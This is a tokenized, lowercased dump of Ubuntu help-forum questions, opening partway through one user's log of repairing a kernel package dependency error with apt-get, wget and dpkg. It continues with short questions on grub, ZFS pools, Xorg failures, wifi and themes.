libxcb-shm0 libxcb1 libxrender1 linux-headers-virtual linux-image-virtual linux-virtual lvm2 multiarch-support mysql-client-core-5.5 mysql-common mysql-server openssl plymouth python-apt python-apt-common rsyslog udev 39 upgraded , 3 newly installed , 0 to remove and 3 not upgraded . 2 not fully installed or removed . need to get 42.6 mb of archives . after this operation , 102 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main linux-image-3.2.0-48-virtual amd64 3.2.0-48.74 [ 12.5 mb ] get:2 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main linux-virtual amd64 3.2.0.48.58 [ 1,758 b ] get:3 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main linux-image-virtual amd64 3.2.0.48.58 [ 2,390 b ] get:4 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main linux-headers-3.2.0-48 all 3.2.0-48.74 [ 11.7 mb ] get:5 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main libc-bin amd64 2.15-0ubuntu10.4 [ 1,181 kb ] get:6 http : //es.archive.ubuntu.com/ubuntu/ precise-updates/main libc6 amd64 2.15-0ubuntu10.4 [ 4,653 kb ] [ ... ] found linux image : /boot/vmlinuz-3.2.0-43-virtual found initrd image : /boot/initrd.img-3.2.0-43-virtual found linux image : /boot/vmlinuz-3.2.0-36-virtual found initrd image : /boot/initrd.img-3.2.0-36-virtual found linux image : /boot/vmlinuz-3.2.0-35-virtual found initrd image : /boot/initrd.img-3.2.0-35-virtual found linux image : /boot/vmlinuz-3.2.0-34-virtual found initrd image : /boot/initrd.img-3.2.0-34-virtual done setting up linux-image-virtual ( 3.2.0.48.58 ) ... setting up linux-headers-3.2.0-48 ( 3.2.0-48.74 ) ... setting up linux-headers-3.2.0-48-virtual ( 3.2.0-48.74 ) ... setting up linux-headers-virtual ( 3.2.0.44.53 ) ... dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) ; however : version of linux-image-virtual on system is 3.2.0.48.58. dpkg : error processing linux-virtual ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . setting up libdbus-1-3 ( 1.4.18-1ubuntu1.4 ) ... setting up libdrm2 ( 2.4.43-0ubuntu0.0.1 ) ... setting up libdrm-intel1 ( 2.4.43-0ubuntu0.0.1 ) ... setting up libdrm-nouveau1a ( 2.4.43-0ubuntu0.0.1 ) ... [ ... ] update-initramfs : deferring update ( trigger activated ) processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-48-virtual errors were encountered while processing : linux-virtual e : sub-process /usr/bin/dpkg returned an error code ( 1 ) # it fails again , complaining about linux-virtual too . the only difference is that , since i run with -f ( orce ) flag set , now i have 3.2.0.48.58 installed too . previously the complaint was : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) but 3.2.0.45.54 is installed now it is : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) but 3.2.0.48.58 is installed # dpkg -- configure linux-virtual dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-image-virtual ( = 3.2.0.44.53 ) ; however : version of linux-image-virtual on system is 3.2.0.48.58. dpkg : error processing linux-virtual ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-virtual # ls -l /usr/src total 32 drwxr-xr-x 24 root root 4096 may 16 06:57 linux-headers-3.2.0-43 drwxr-xr-x 7 root root 4096 may 16 06:57 linux-headers-3.2.0-43-virtual drwxr-xr-x 24 root root 4096 may 24 06:41 linux-headers-3.2.0-44 drwxr-xr-x 7 root root 4096 jun 14 08:12 linux-headers-3.2.0-44-virtual drwxr-xr-x 24 root root 4096 jun 6 14:48 linux-headers-3.2.0-45 drwxr-xr-x 7 root root 4096 jun 6 14:48 linux-headers-3.2.0-45-virtual drwxr-xr-x 24 root root 4096 jun 14 08:16 linux-headers-3.2.0-48 drwxr-xr-x 7 root root 4096 jun 14 08:16 linux-headers-3.2.0-48-virtual # dpkg -- list linux-headers-3.2.0-44 libc6 linux-virtual | cat desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===================================-============================-=============================================================== ii libc6 2.15-0ubuntu10.4 embedded gnu c library : shared libraries ii linux-headers-3.2.0-44 3.2.0-44.69 header files related to linux kernel version 3.2.0 iu linux-virtual 3.2.0.44.53 complete linux kernel for virtual machines # uname -r 3.2.0-45-virtual any more ideas ? if you still think that the easiest way to follow on is falling back to a previous kernel version and let it update again from there , i think we can use 3.2.0.43 since i have linux-headers-3.2.0-43 and linux-headers-3.2.0-43-virtual under /usr/src/ and also all the needed files in /boot/ # ls -l /boot/*3.2.0-43* -rw-r -- r -- 1 root root 794949 may 15 06:33 /boot/abi-3.2.0-43-virtual -rw-r -- r -- 1 root root 140637 may 15 06:33 /boot/config-3.2.0-43-virtual -rw-r -- r -- 1 root root 4791807 may 16 06:57 /boot/initrd.img-3.2.0-43-virtual -rw -- -- -- - 1 root root 2890123 may 15 06:33 /boot/system.map-3.2.0-43-virtual -rw -- -- -- - 1 root root 4961104 may 15 06:33 /boot/vmlinuz-3.2.0-43-virtual thanks . it prevents me from installing it too : # wget http : //launchpadlibrarian.net/141816244/linux-virtual_3.2.0.48.58_amd64.deb -- 2013-06-14 11:42:37 -- http : //launchpadlibrarian.net/141816244/linux-virtual_3.2.0.48.58_amd64.deb resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.228 , 91.189.89.229 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.228|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1758 ( 1.7k ) [ application/x-debian-package ] saving to : `linux-virtual_3.2.0.48.58_amd64.deb' 100 % [ ========================================================================================== > ] 1,758 -- .-k/s in 0s 2013-06-14 11:42:37 ( 184 mb/s ) - `linux-virtual_3.2.0.48.58_amd64.deb ' saved [ 1758/1758 ] # dpkg -- install linux-virtual_3.2.0.48.58_amd64.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-virtual 3.2.0.44.53 ( using linux-virtual_3.2.0.48.58_amd64.deb ) ... unpacking replacement linux-virtual ... dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-headers-virtual ( = 3.2.0.48.58 ) ; however : version of linux-headers-virtual on system is 3.2.0.44.53. dpkg : error processing linux-virtual ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-virtual download the two .deb files # wget http : //launchpadlibrarian.net/141821073/linux-headers-3.2.0-48-virtual_3.2.0-48.74_amd64.deb [ ... ] # wget http : //launchpadlibrarian.net/141823437/linux-headers-3.2.0-48_3.2.0-48.74_all.deb [ ... ] install them # dpkg -- install linux-headers-3.2.0-48-virtual_3.2.0-48.74_amd64.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-headers-3.2.0-48-virtual 3.2.0-48.74 ( using linux-headers-3.2.0-48-virtual_3.2.0-48.74_amd64.deb ) ... unpacking replacement linux-headers-3.2.0-48-virtual ... setting up linux-headers-3.2.0-48-virtual ( 3.2.0-48.74 ) ... # dpkg -- install linux-headers-3.2.0-48_3.2.0-48.74_all.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-headers-3.2.0-48 3.2.0-48.74 ( using linux-headers-3.2.0-48_3.2.0-48.74_all.deb ) ... unpacking replacement linux-headers-3.2.0-48 ... setting up linux-headers-3.2.0-48 ( 3.2.0-48.74 ) ... try to install the original .deb package which dependencies did not met # dpkg -- install linux-virtual_3.2.0.48.58_amd64.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-virtual 3.2.0.48.58 ( using linux-virtual_3.2.0.48.58_amd64.deb ) ... unpacking replacement linux-virtual ... dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-headers-virtual ( = 3.2.0.48.58 ) ; however : version of linux-headers-virtual on system is 3.2.0.44.53. dpkg : error processing linux-virtual ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-virtual since it still complains , i guess i should download and install the missing package . this step is on my own : ) # wget http : //launchpadlibrarian.net/141816242/linux-headers-virtual_3.2.0.48.58_amd64.deb [ ... ] # dpkg -- install linux-headers-virtual_3.2.0.48.58_amd64.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-headers-virtual 3.2.0.44.53 ( using linux-headers-virtual_3.2.0.48.58_amd64.deb ) ... unpacking replacement linux-headers-virtual ... setting up linux-headers-virtual ( 3.2.0.48.58 ) ... try to install the package that gave errors # dpkg -- install linux-virtual_3.2.0.48.58_amd64.deb ( reading database ... 120232 files and directories currently installed . ) preparing to replace linux-virtual 3.2.0.48.58 ( using linux-virtual_3.2.0.48.58_amd64.deb ) ... unpacking replacement linux-virtual ... setting up linux-virtual ( 3.2.0.48.58 ) ... and finally worked ! ! ! ! ! # apt-get update [ ... ] # apt-get upgrade [ ... ] everything is ok , and without errors . thanks a lot lgarzo ! ! ! please , post something as an answer ( instead of a comment ) so that i can give you credit for your invaluable help . cheers .
304816	can not boot 12.04lts from usb hdd	i have installed ubuntu 12.04lts on an external usb hdd , and put the bootloader onto the same drive . this is so i can interrupt the boot sequence on the pc and force the system to boot from the external drive when i want to use ubuntu . ( and at other times the pc will still boot seamlessly into windows from the internal hdd for the rest of the family to use ) . when i try to boot from the external drive , however , it drops into the `` grub rescue '' prompt . i have tried several suggestions , including reinstallation , and repairing or reinstalling grub from the command line of the live cd . none of these have resolved the problem . i have seen several similar postings on various ubuntu sites , and i wonder if there are technical issues preventing running ubuntu from an external usb drive in this way ? ( until recently i had mandriva , and this worked fine ) . is it simply that the external usb hdd does not respond quickly enough for the system ? does ubuntu need to be on the internal hdd ?
304817	how do i upgrade the version of phpmyadmin from 3.3 to 3.5 ?	i 've installed phpmyadmin and i want to change its theme , i want to install the metro 2.0 theme from http : //www.phpmyadmin.net/home_page/themes.php , but this theme is only compatible with the version 3.5 of phpmyadmin , while my current version is : 3.3.2deb1 . how can i upgrade this version to 3.5 ? i tried to reinstall the phpmyadmin package and then install it using the apt-get install phpmyadmin command , but it 's always the version 3.3.2deb1 being installed .
304818	does ubuntu install well on the gateway ne56r31u ? are there any ceveats or things to watch out for ?	does ubuntu install well on the gateway ne56r31u ? are there any ceveats or things to watch out for ? ( given the uefi/secureboot/windows8 hassles ... ) thanks .
304821	ubuntu one fails after install on windows 8	the ubuntuone 4.2.0 installer completed and then reported an error when the config dialog box appeared . `` typeerror required argument 'type ' ( pos 2 ) not found '' . installer was run as 'administrator ' . the windows event viewer seems to caught some information : faulting application name : ubuntu-sso-login.exe , version : 4.2.0.0 , time stamp : 0x49180193 faulting module name : python27.dll , version : 2.7.3150.1013 , time stamp : 0x4f84a6c7 exception code : 0xc0000005 fault offset : 0x0001db56 faulting process id : 0xc68 faulting application start time : 0x01ce62b7ba03e29c faulting application path : c : \program files ( x86 ) \ubuntuone\dist\ubuntu-sso-login.exe faulting module path : c : \program files ( x86 ) \ubuntuone\dist\python27.dll report id : f19b1da7-ceab-11e2-be7e-c0f8da76cfc8
304822	how do i get ubuntu to forget all about an old zpool ?	my ubuntu 12.04 system has two zpools : rpool ( containing the root filesystem ) and rdata ( containing all other data ) . rdata was originally 2 x 1tb disks mirrored . because i could n't upgrade rdata to 3tb disks ( wrong ashift ) i had to create a new zpool from the new 3tb disks : initially called datapool . i then rsync 'd all the data across , exported rdata , imported datapool as rdata and bob 's your uncle . i then powered off and removed the old disks . however ... when i powered back on , zpool status shows pool : rdata state : unavail status : one or more devices could not be used because the label is missing or invalid . there are insufficient replicas for the pool to continue functioning . action : destroy and re-create the pool from a backup source . see : http : //zfsonlinux.org/msg/zfs-8000-5e scan : none requested config : name state read write cksum rdata unavail 0 0 0 insufficient replicas mirror-0 unavail 0 0 0 insufficient replicas scsi-sata_wdc_wd10eads-00_wd-wcau47275172-part1 unavail 0 0 0 scsi-sata_wdc_wd10eads-00_wd-wcau47283913-part1 unavail 0 0 0 pool : rpool state : online scan : scrub repaired 0 in 0h23m with 0 errors on tue jun 4 11:33:29 2013 config : name state read write cksum rpool online 0 0 0 ata-maxtor_6y120l0_y31j3cle-part2 online 0 0 0 errors : no known data errors as you can see , zpool status is still showing the old rdata ; which is not available . zpool import shows pool : rdata id : 7033445233439275442 state : online action : the pool can be imported using its name or numeric identifier . config : rdata online mirror-0 online scsi-sata_st3000dm001-1ch_w1f1ee1g online scsi-sata_st3000dm001-1ch_w1f25se2 online this is the correct rdata question : how do i get ubuntu to forget all about the old zpool ?
304830	run a command with the argument from the last command	when running commands , sometimes maybe you need to run a command with the argument from the last command . how can you do this ? of course , excepting the use of the arrow keys and del keys : ↑←←← ... ←→→deldeldel ... del < new_command > .
304838	wifi problems with intel centrino wireless-n 2230 on ubuntu 12.04	so i have searched high and low and nothing seems to work . i bought this lenovo p500 ideapad , got rid of windows8 and threw ubuntu 12.04 on here . my centrino wireless-n 2230 card seems to be giving me trouble . it will be at full speed at times ( 25mb down / 5.5 mb up ) then drop to almost nothing ( ~2mb down / `0.5mb up ) for no reason what so ever . usually within 5 minutes of rebooting . i have tried everything out there on the web . i have disabled wireless n , i have turned off power management , i have disabled ipv6 , etc etc . most changes seem to work initially and then not at all . so is there a solution someone may have or help in the matter . it has been a couple years since i have used linux , so any help with commands and trouble shooting would be greatly appreciated . here are some terminal stuff : rfkill list 1 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no 5 : phy1 : wireless lan soft blocked : no hard blocked : no iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : '' birchcrest '' mode : managed frequency:2.437 ghz access point : 68:7f:74 : d4:0a : fa bit rate=54 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=50/70 signal level=-60 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:130 invalid misc:203 missed beacon:0
304842	disable window decoration for specific applications	is there a way to configure the window manager to disable window decorations ( title bar , preferably no borders either ) to specific applications ( based on the name of the app , title of the window , or anything similar ... ) ? i 'm using ubuntu 13.04 .
304843	can not play farmville in fullscreen	i am using kubuntu 13.04 in my hcl laptop which has i5 processor , nvidia gt 520m graphics , 4gb of ram and the problem is that i can not play farmvilla in full screen mode or zoom much . it even does n't show the full screen button . what might be the problem ?
304845	`` no screens found '' after apt-get upgrade with intel video card	my mythbuntu installation ( based on ubuntu 12.04 ) , which has been running without issues for years , suddenly wo n't start x windows after doing a simple `` apt-get upgrade '' . several packages were upgraded , but the relevant ones from /var/log/dpkg.log appear to be : 2013-06-01 11:13:19 upgrade lightdm 1.2.3-0ubuntu2 1.2.3-0ubuntu2.1 2013-06-01 11:13:49 upgrade liblightdm-gobject-1-0 1.2.3-0ubuntu2 1.2.3-0ubuntu2.1 2013-06-01 11:13:52 upgrade linux-generic 3.2.0.43.51 3.2.0.45.54 2013-06-01 11:13:52 upgrade linux-image-generic 3.2.0.43.51 3.2.0.45.54 2013-06-01 11:14:02 upgrade linux-headers-generic 3.2.0.43.51 3.2.0.45.54 the log from /var/log/xorg.0.log is as follows : [ 35.853 ] x.org x server 1.11.3 release date : 2011-12-16 [ 35.853 ] x protocol version 11 , revision 0 [ 35.853 ] build operating system : linux 2.6.42-37-generic i686 ubuntu [ 35.853 ] current operating system : linux mythtv 3.2.0-45-generic # 70-ubuntu smp wed may 29 20:11:31 utc 2013 i686 [ 35.853 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-45-generic root=uuid=57cd8ecb-7fd4-4c9a-b0c3-cab934656a22 ro quiet splash vmalloc=256m vt.handoff=7 [ 35.853 ] build date : 11 april 2013 01:04:30pm [ 35.853 ] xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) [ 35.853 ] current version of pixman : 0.24.4 [ 35.853 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 35.853 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 35.854 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed jun 5 08:52:03 2013 [ 35.854 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 35.854 ] ( == ) no layout section . using the first screen section . [ 35.854 ] ( == ) no screen section available . using defaults . [ 35.854 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 35.854 ] ( ** ) | | -- > monitor `` '' [ 35.854 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 35.854 ] ( == ) automatically adding devices [ 35.854 ] ( == ) automatically enabling devices [ 35.854 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 35.854 ] entry deleted from font path . [ 35.854 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 35.854 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 35.854 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 35.854 ] ( ii ) loader magic : 0xa075a0 [ 35.854 ] ( ii ) module abi versions : [ 35.854 ] x.org ansi c emulation : 0.4 [ 35.854 ] x.org video driver : 11.0 [ 35.854 ] x.org xinput driver : 16.0 [ 35.854 ] x.org server extension : 6.0 [ 35.855 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:2e42:1043:83cc rev 3 , mem @ 0xf9800000/4194304 , 0xd0000000/268435456 , i/o @ 0x0000ec00/8 [ 35.855 ] ( -- ) pci : ( 0:0:2:1 ) 8086:2e43:1043:83cc rev 3 , mem @ 0xf9f00000/1048576 [ 35.855 ] ( -- ) pci : ( 0:1:1:0 ) 14f1:8800:7063:5500 rev 5 , mem @ 0xfa000000/16777216 [ 35.855 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 35.855 ] ( ii ) loadmodule : `` extmod '' [ 35.856 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 35.856 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 35.856 ] compiled for 1.11.3 , module version = 1.0.0 [ 35.856 ] module class : x.org server extension [ 35.856 ] abi class : x.org server extension , version 6.0 [ 35.856 ] ( ii ) loading extension mit-screen-saver [ 35.856 ] ( ii ) loading extension xfree86-vidmodeextension [ 35.856 ] ( ii ) loading extension xfree86-dga [ 35.856 ] ( ii ) loading extension dpms [ 35.856 ] ( ii ) loading extension xvideo [ 35.856 ] ( ii ) loading extension xvideo-motioncompensation [ 35.856 ] ( ii ) loading extension x-resource [ 35.856 ] ( ii ) loadmodule : `` dbe '' [ 35.856 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 35.856 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 35.856 ] compiled for 1.11.3 , module version = 1.0.0 [ 35.856 ] module class : x.org server extension [ 35.856 ] abi class : x.org server extension , version 6.0 [ 35.856 ] ( ii ) loading extension double-buffer [ 35.856 ] ( ii ) loadmodule : `` glx '' [ 35.856 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 35.856 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 35.856 ] compiled for 1.11.3 , module version = 1.0.0 [ 35.856 ] abi class : x.org server extension , version 6.0 [ 35.856 ] ( == ) aiglx enabled [ 35.856 ] ( ii ) loading extension glx [ 35.856 ] ( ii ) loadmodule : `` record '' [ 35.856 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 35.856 ] ( ii ) module record : vendor= '' x.org foundation '' [ 35.856 ] compiled for 1.11.3 , module version = 1.13.0 [ 35.856 ] module class : x.org server extension [ 35.856 ] abi class : x.org server extension , version 6.0 [ 35.856 ] ( ii ) loading extension record [ 35.856 ] ( ii ) loadmodule : `` dri '' [ 35.856 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 35.857 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 35.857 ] compiled for 1.11.3 , module version = 1.0.0 [ 35.857 ] abi class : x.org server extension , version 6.0 [ 35.857 ] ( ii ) loading extension xfree86-dri [ 35.857 ] ( ii ) loadmodule : `` dri2 '' [ 35.857 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 35.857 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 35.857 ] compiled for 1.11.3 , module version = 1.2.0 [ 35.857 ] abi class : x.org server extension , version 6.0 [ 35.857 ] ( ii ) loading extension dri2 [ 35.857 ] ( == ) matched intel as autoconfigured driver 0 [ 35.857 ] ( == ) matched vesa as autoconfigured driver 1 [ 35.857 ] ( == ) matched fbdev as autoconfigured driver 2 [ 35.857 ] ( == ) assigned the driver to the xf86configlayout [ 35.857 ] ( ii ) loadmodule : `` intel '' [ 35.857 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 35.857 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 35.857 ] compiled for 1.11.3 , module version = 2.19.0 [ 35.857 ] module class : x.org video driver [ 35.857 ] abi class : x.org video driver , version 11.0 [ 35.857 ] ( ii ) loadmodule : `` vesa '' [ 35.857 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 35.857 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 35.857 ] compiled for 1.11.3 , module version = 2.3.0 [ 35.857 ] module class : x.org video driver [ 35.857 ] abi class : x.org video driver , version 11.0 [ 35.857 ] ( ii ) loadmodule : `` fbdev '' [ 35.858 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 35.858 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 35.858 ] compiled for 1.11.3 , module version = 0.4.2 [ 35.858 ] abi class : x.org video driver , version 11.0 [ 35.858 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) [ 35.858 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 35.858 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 35.858 ] ( -- ) using vt number 7 [ 35.866 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 35.866 ] ( ww ) falling back to old probe method for vesa [ 35.866 ] ( ww ) falling back to old probe method for fbdev [ 35.866 ] ( ii ) loading sub module `` fbdevhw '' [ 35.866 ] ( ii ) loadmodule : `` fbdevhw '' [ 35.866 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 35.867 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 35.867 ] compiled for 1.11.3 , module version = 0.0.2 [ 35.867 ] abi class : x.org video driver , version 11.0 [ 35.867 ] drmopendevice : node name is /dev/dri/card0 [ 35.867 ] drmopendevice : open result is 9 , ( ok ) [ 35.867 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 35.867 ] drmopendevice : node name is /dev/dri/card0 [ 35.867 ] drmopendevice : open result is 9 , ( ok ) [ 35.867 ] drmopenbybusid : drmopenminor returns 9 [ 35.867 ] drmopenbybusid : drmgetbusid reports pci:0000:00:02.0 [ 35.867 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 35.867 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 35.867 ] ( == ) intel ( 0 ) : rgb weight 888 [ 35.867 ] ( == ) intel ( 0 ) : default visual is truecolor [ 35.867 ] ( ii ) intel ( 0 ) : integrated graphics chipset : intel ( r ) b43 [ 35.867 ] ( -- ) intel ( 0 ) : chipset : `` b43 '' [ 35.867 ] ( ii ) unloadmodule : `` intel '' [ 35.867 ] ( ii ) unloading intel [ 35.867 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 35.867 ] fatal server error : [ 35.867 ] no screens found [ 35.867 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 35.867 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 35.867 ] [ 35.879 ] ddxsiggiveup : closing log [ 35.879 ] server terminated with error ( 1 ) . closing log file . the pc contains an integrated intel video card ( intel corporation 4 series chipset integrated graphics controller ( rev 03 ) ) and a hd-5500 hdtv tv tuner card ( conexant systems , inc. cx23880/1/2/3 pci video and audio decoder ( rev 05 ) ) . there is no /etc/x11/xorg.conf file . so far , i 've tried the following : downgrading to an older linux kernel : `` apt-get install linux-generic=3.2.0.45.54 '' downgrading lightdm : `` apt-get install lightdm=1.2.1-0ubuntu1 '' running `` x -configure '' and restarting ( i deleted the generated xorg.conf after it did n't work ) so far , i seem to get the same error no matter what i do . any suggestions ?
304848	how to get windows look on ubuntu ?	i like the functions of ubuntu . but i prefer the windows look . is there some ubuntu modification that looks like windows ? ubuntu looks too cartoonish and unprofessional . windows ist more german-like . streight lines , sharp and thin cursors and fonts etc . including mouse cursors , fonts and window look ? i am currently using 13.04 version of ubuntu . it could be the old fashioned look : or aero :
304850	how do i solve grub 1.99 default timeout error ?	i am using grub 1.99 and ubuntu . i edited the grub and set default_timeout as 0 , but it loads directly into windows 8 , so how do i get back to ubuntu to re-edit ?
304858	ccsm commands plugin resets	i use the commands plugin in compizconfig settings manager to bind some useful scripts to keybinds . it works , however after rebooting my computer , the list with commands is always emptied . anyone knows how this comes ? regards , brendt
304860	what is the systemctl equivalent	i am converting a package from .rpm to .deb using this tutorial . however , to test and debug the application i need to run it . the programs readme explains to run it as a service with : systemctl enable progname.service systemctl start progname.service what is the equivalent on ubuntu for these commands ?
304866	how to apply 3rd party themes ?	i was looking for a dark theme to install and came across this page . i followed the instructions to install the trevilla-icons and trevilla-jmhzone-dark theme , but i ca n't select them on the appearance settings under themes it does n't show up , am i going about selecting the theme all wrong ? i 've never installed themes before so i 'm a bit lost .
304867	ubuntu 13.04 why does xbmc go into full screen correctly ( top bar hidden ) but mythtv does not ?	xbmc enters full screen correctly hiding the top menu bar but mythtv does n't hide the top bar ?
304868	why do i need to use lite mode in the new google maps ? ( chrome )	i was wondering if i could use the new google maps . i have latest stable chrome and ubuntu 13.04 . i am currently told that i must use lite mode . under chrome in windows 8 on the same machine it works perfectly .
304873	typing lower case 'i ' anywhere in ubuntu 12.04 causes a 'no sign ' to appear . hitting 8 causes my window to maximize	i have no idea what i 've done , but this morning , i think i might have fat-fingered the keyboard and now whenever i type a lower case i a no sign pops up ( circle with diagonal slash ) . unusually enough , a capital i does n't invoke this . and lastly , half the time when i do hit a lower case i , ether the i does n't end up getting typed , or the following letter does n't get typed . with all the i 's in this post , you can image it took me a while to type this . oh great , as i was typing this , i found out that typing 8 or asterisk ( * ) causes the window to maximize . what did i do wrong ?
304877	how to get touch screen gestures ?	i have an android tablet that i use to remote control my ubuntu 13.04 netbook , the program i use is team viewer . you ca only control the mouse and it is pretty rubbish like that . can i get some touchscreen gestures ?
304880	what are some of these directories in the linux kernel src ?	when i uncompress the linux kernel source code from kernel.org , there are many folders . i know what most of them contain and their purpose . however , i can not figure out or find on the internet the purpose for the tools , samples , and block directories . what are these three directories and what is their purpose ?
304882	ignore warning prior to upgrade ?	below is a warning that i got when i attempted to upgrade my ubuntu from 12.04 to 12.10 i wish to upgrade because currently my screen brightness issue is n't resolved and i strongly feel it 's due to the absence of a graphics driver ( like intel cedarview , which appears to be a driver meant only for the 32-bit version ) . the easy way out would be to upgrade but i get a warning as seen above . my question : would it be safe for me to go ahead with the upgrade or not ?
304896	install 13.04 to a specific partition	i 'm trying to install ubuntu on a machine that already runs windows 7 . before installing , i shrank the windows partition and added a new ext2 partition called /dev/sda4 using gparted . when i rebooted with the installation media inserted and started the installation process , ubuntu reported `` this hard drive is empty . do you wish to erase/format ( ? ) it ? then , it gave me a number of options . how do i proceed from this point and install to /dev/sda4 ?
